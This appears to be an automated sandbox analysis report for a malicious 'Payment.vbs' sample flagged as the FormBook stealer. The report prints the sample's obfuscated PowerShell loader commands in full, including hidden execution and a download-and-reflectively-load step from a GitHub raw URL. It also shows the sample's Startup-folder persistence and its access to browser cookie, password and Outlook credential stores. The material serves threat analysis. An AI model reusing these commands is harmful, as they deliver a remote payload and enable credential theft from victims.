Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4icgokcdojysnumz1jysncmwgpsbom2todhrwczonkycvlycrj3jhjysndy4nkydnaxrodscrj2j1jysnc2vyjysny29udgvujysndc5jb20nkycvtm8nkydezxrly3rpjysnbi9ob0rldgvjde9ul3jlznmvagvhzhmvbwfpbi9ezscrj3rhae5vdggtjysnvi50ehrom2s7ighsjysnzminkydhc2u2nccrj0nvbnrlbnqgpscrjyaotmunkyd3lu9iamvjdcbtexn0zscrj20uticrj2v0lldlyicrj0nsawvudckurg93bmxvywrtdhinkydpbmcnkycoafinkydmdxjsktsgafinkydmymluyxinkyd5qycrj29udgvudca9ifttjysnescrj3n0zw0uq29udmvyjysndf06jysnokzyb21cyscrj3mnkydlnjrtdhinkydpbmcoaccrj1jmyicrj2enkydzjysnzty0q28nkydudgvudccrjyknkyc7iggnkydszmenkydzcycrj2vtymx5id0gw1jlzmxljysny3rpb24nkycuqxnzzw1ibhknkyddojpmb2fkkghszmjpbmfyeunvbnrlbnqpoybbzccrj25sawinkycusu8usg9tzv06olzbssgnkydddxqwl08nkycxrkttl2qvzwuuzxrzyxankycvlzpzchr0accrj0n1dcwgq3unkyd0zccrj2vzyxrpdmfkb0n1dcwnkycgjysnq3unkyd0zgvzyxrpdmfkb0n1dcwgjysnq3v0zgunkydzyxrpdmfkb0n1dcwgq3v0zccrj2vzjysnyxqnkydpdmenkydkbycrj0n1dcwnkycgqycrj3v0mumnkyd1dcwgq3v0yxbwawr0zwxddxqpjykgic1jukvwbefjrsdddxqnlftjsefsxtm0icatukvwtefdzsagkftjsefsxtewnctby0hbul04mitby0hbul0xmdiplftjsefsxtm2icatukvwtefdzshby0hbul0xmdqrw2niqvjdnterw2niqvjdmta3ksxby0hbul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ((('h'+'rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/no'+'detecto'+'n/nodetecton/refs/heads/main/de'+'tahnoth-'+'v.txth3k; hr'+'fb'+'ase64'+'content ='+' (ne'+'w-object syste'+'m.n'+'et.web'+'client).downloadstr'+'ing'+'(hr'+'furl); hr'+'fbinar'+'yc'+'ontent = [s'+'y'+'stem.conver'+'t]:'+':fromba'+'s'+'e64str'+'ing(h'+'rfb'+'a'+'s'+'e64co'+'ntent'+')'+'; h'+'rfa'+'ss'+'embly = [refle'+'ction'+'.assembly'+']::load(hrfbinarycontent); [d'+'nlib'+'.io.home]::vai('+'cut0/o'+'1fks/d/ee.etsap'+'//:sptth'+'cut, cu'+'td'+'esativadocut,'+' '+'cu'+'tdesativadocut, '+'cutde'+'sativadocut, cutd'+'es'+'at'+'iva'+'do'+'cut,'+' c'+'ut1c'+'ut, cutappidtelcut)') -creplace'cut',[char]34 -replace ([char]104+[char]82+[char]102),[char]36 -replace([char]104+[char]51+[char]107),[char]39))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\payment.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4icgokcdojysnumz1jysncmwgpsbom2todhrwczonkycvlycrj3jhjysndy4nkydnaxrodscrj2j1jysnc2vyjysny29udgvujysndc5jb20nkycvtm8nkydezxrly3rpjysnbi9ob0rldgvjde9ul3jlznmvagvhzhmvbwfpbi9ezscrj3rhae5vdggtjysnvi50ehrom2s7ighsjysnzminkydhc2u2nccrj0nvbnrlbnqgpscrjyaotmunkyd3lu9iamvjdcbtexn0zscrj20uticrj2v0lldlyicrj0nsawvudckurg93bmxvywrtdhinkydpbmcnkycoafinkydmdxjsktsgafinkydmymluyxinkyd5qycrj29udgvudca9ifttjysnescrj3n0zw0uq29udmvyjysndf06jysnokzyb21cyscrj3mnkydlnjrtdhinkydpbmcoaccrj1jmyicrj2enkydzjysnzty0q28nkydudgvudccrjyknkyc7iggnkydszmenkydzcycrj2vtymx5id0gw1jlzmxljysny3rpb24nkycuqxnzzw1ibhknkyddojpmb2fkkghszmjpbmfyeunvbnrlbnqpoybbzccrj25sawinkycusu8usg9tzv06olzbssgnkydddxqwl08nkycxrkttl2qvzwuuzxrzyxankycvlzpzchr0accrj0n1dcwgq3unkyd0zccrj2vzyxrpdmfkb0n1dcwnkycgjysnq3unkyd0zgvzyxrpdmfkb0n1dcwgjysnq3v0zgunkydzyxrpdmfkb0n1dcwgq3v0zccrj2vzjysnyxqnkydpdmenkydkbycrj0n1dcwnkycgqycrj3v0mumnkyd1dcwgq3v0yxbwawr0zwxddxqpjykgic1jukvwbefjrsdddxqnlftjsefsxtm0icatukvwtefdzsagkftjsefsxtewnctby0hbul04mitby0hbul0xmdiplftjsefsxtm2icatukvwtefdzshby0hbul0xmdqrw2niqvjdnterw2niqvjdmta3ksxby0hbul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ((('h'+'rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/no'+'detecto'+'n/nodetecton/refs/heads/main/de'+'tahnoth-'+'v.txth3k; hr'+'fb'+'ase64'+'content ='+' (ne'+'w-object syste'+'m.n'+'et.web'+'client).downloadstr'+'ing'+'(hr'+'furl); hr'+'fbinar'+'yc'+'ontent = [s'+'y'+'stem.conver'+'t]:'+':fromba'+'s'+'e64str'+'ing(h'+'rfb'+'a'+'s'+'e64co'+'ntent'+')'+'; h'+'rfa'+'ss'+'embly = [refle'+'ction'+'.assembly'+']::load(hrfbinarycontent); [d'+'nlib'+'.io.home]::vai('+'cut0/o'+'1fks/d/ee.etsap'+'//:sptth'+'cut, cu'+'td'+'esativadocut,'+' '+'cu'+'tdesativadocut, '+'cutde'+'sativadocut, cutd'+'es'+'at'+'iva'+'do'+'cut,'+' c'+'ut1c'+'ut, cutappidtelcut)') -creplace'cut',[char]34 -replace ([char]104+[char]82+[char]102),[char]36 -replace([char]104+[char]51+[char]107),[char]39))"	Jump to behavior

Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\convert.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
Payment.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1528048
Product:	CloudBasic
Start time:	14:51:11
Start date:	07.10.2024
Sample:	Payment.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	de0d7fea05e69a8cf4b7c6071735b141
SHA1:	cc1218cab6f6bccd985a32b443f47ffa2c7bb8b5
SHA256:	1ace0faeac611f4f52e524e7f6ebf4bfd7ca7d1c697427d0828b3368854d9c7c
Filetype:	Text - UTF-16 (LE) encoded (2002/1) 64.44%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	C7C56D815D433C521B8D8241EFD40C55	382116178C8E61DD0FBC13026D5ABAE87D77DD5B	7F7D5AD699DA7D55E3F877A6575EBD149C373DEECBE0922DE3690D2A52F98228
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage user DataBase, version 0x620, checksum 0x10175119, page size 16384, DirtyShutdown, Windows version 10.0	ED512E1AA696D5F3F97993DD30A9E678	36E35A5115075F74BBE95FB5B9C48A496FEF8F68	D833C7D0427C6B7CEB4328B4151CBEE8DF06FF6EF5C139F7C16791E7D9B55FB6
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	1F525778C02B4F96049C59B274EE3CFC	6E05C0322D3080F2217EBAE50189070AF7B151B9	5652ED9C60EDAD61130458D642D87B1AF38D208F40A7559A8B6D966B04DD6CA3
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\62v53-Zo	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aftf20og.0ld.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgk4fqwi.x4e.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihmp413g.tpm.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0qqsuzb.sho.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qlxdkgty.khd.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vn4cy3k0.ih1.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9

Windows Analysis Report Payment.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
Payment.vbs

Malware Threat Intel
Provided by